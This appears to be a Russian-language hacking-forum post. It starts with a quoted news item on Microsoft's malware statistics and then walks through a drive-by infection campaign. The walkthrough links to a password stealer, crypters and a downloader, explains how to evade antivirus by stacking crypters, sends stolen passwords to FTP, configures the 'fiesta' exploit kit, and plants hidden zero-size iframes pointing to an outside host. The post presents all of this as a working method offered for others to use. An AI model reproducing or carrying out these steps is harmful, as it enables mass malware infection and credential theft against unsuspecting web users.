Трояны: популяция растет...
«Нынешний отчет Security Intelligence Report (SIR), выполненный Microsoft, стал уже пятым по счету. Обзор составляется преимущественно на основе данных, собранных с миллионов компьютеров по всему миру, на которых установлен лицензионный софт Microsoft – весьма репрезентативная статистическая выборка. Каждый второй вторник месяца вместе с программными обновлениями на компьютеры пользователей устанавливается программа Windows Malicious Software Removal Tool (MSRT), которая проверяет машины на наличие наиболее известного вредоносного ПО, в случае обнаружения удаляет их и отправляет отчет на сервер Microsoft. Данные о подцепившем заразу компьютере, разумеется, не персонифицируются.
Результаты исследования, мягко говоря, не обнадеживают. За последние полгода количество зараженных компьютеров в мире увеличилось на 43%. Но на операционные системы приходится, по данным Microsoft, 10% от общего числа уязвимостей, используемых злоумышленниками.»
А здесь один из троянов: rapidshare.com/files/128751085/1.rar.html
Здесь я хочу рассказать о небольшой вещице, которую я недавно проделал.
(Троянизация населения)
[Вступление ]
Не видел ни одной более, менее полной статьи на эту тему, поэтому решил исправить сию несправедливость.
Если вы считаете, что вы настоящий профи андеграунда, то можете дальше не читать, избавьте меня от глупых комментов. Если же вы в этом просто разбираетесь, то думаю, что всё равно можете найти что-нибудь полезное.
Что нам понадобится:
Codesoft PW-Stealer v0.35
http://rapidshare.com/files/13003908..._in_1.rar.html
Крипторы
http://rapidshare.com/files/130321423/Crypters.rar
TradeCrew Webdownloader 0.2 VIP
http://rapidshare.com/files/90364914...2_VIP.rar.html
Связка fiesta
Где брал, не помню, но найти не проблема.
Собственно весь этот список можно менять как угодно. В данном случае я просто выбрал то, с чем ещё не сталкивался, чтобы было интереснее писать статью.
[ Подготовка ]
Для начала настроим Codesoft PW-Stealer. В целом всё интуитивно понятно. Отчёты лучше всего отправлять на фтп т.к на мэйл они не всегда доходят. Да и если сначала доходят, то потом могут начать удаляться антиспам ботом. Вводим все параметры, не забываем нажать FTP Check.
Security-settingsлучше ставить галочки так же, как и на скрине. Иначе иногда по непонятным причинам не работает. Остальные настройки так, как вам больше нравится.
[ Криптовка ]
Теперь нам надо закриптовать CPWS. Обычно люди делают это платными крипторами, но статья рассчитана на всех, поэтому расскажу, как добиться наилучшего результата бесплатно. В самом начале есть архив с коллекцией крипторов, в нём есть несколько приватных, которые на данный момент, скорее всего таковыми уже быть перестали. Чтобы антивирус жертв не ругался нам всего лишь нужно скомбинировать два криптора из архива. Какие именно, трудно сказать (ибо у меня платный), вообщем надо эксперементировать. Сначала криптуешь одним, затем другим. Запускаешь, смотришь работает ли, проверяешь на http://novirusthanks.org . В общем технология проста.
[ Webdownloader ]
Для начала расскажу, зачем он нам нужен. Именно TradeCrew Webdownloader 0.2 VIP будет запускаться связкой на компьютере счастливчика. А затем скачает и запустит CPWS. Для чего такие тонкости? Всё просто, билд CPWS даже после криптовки получился размером в 713 Кб. И для связки такой размер совсем не катит.
Итак, закачиваем наш билд CPWS в интернет. Необязательно на свой хост, ведь полно бесплатных, за которыми совсем не следят. Главное не на ломанный т.к если владелец оказаться более менее знающим, то может заменить ваш файл.
Открываем TradeCrew Webdownloader 0.2 VIP . Указываем ссылку на файл, который только что закачали. Жмём Build. При необходимости тоже криптуем.
[ Связка ]
Все связки настраиваются почти одинаково, но всё же уделю этому моменту немного внимания.
Открываем config.php и меняем:
SQLLOGIN = "Логин к базе";
$SQLPWD = "Пароль к базе";
$SQLDB = "Имя базы";
$URL = "[Путь к связке]/load.php";
$PASSWORD = "Пароль к админке";
Если вы используете другую связку, и в ней нет файла install.php, или каталога install, то экспортируйте SQLбазу через phpmyadmin (она обычно лежит в архиве со связкой base.sql).
Перемещаем Билд от TradeCrew Webdownloader 0.2 VIP в папку со связкой и переименовываем в load.exe
Закачиваем всю папку со связкой на сервер.
Теперь осталось всего лишь расставить iframeкоды на несколько сайтов и ждать результата.
<iframe src="http://k0d.biz/fiesta /index.php" width="0" height="0"></iframe>
Для шифровки есть масса сервисов и утилит, к примеру ness-team.ru/index/0-8
[ Итог ]
На практике все было действительно хорошо. Система работала классно!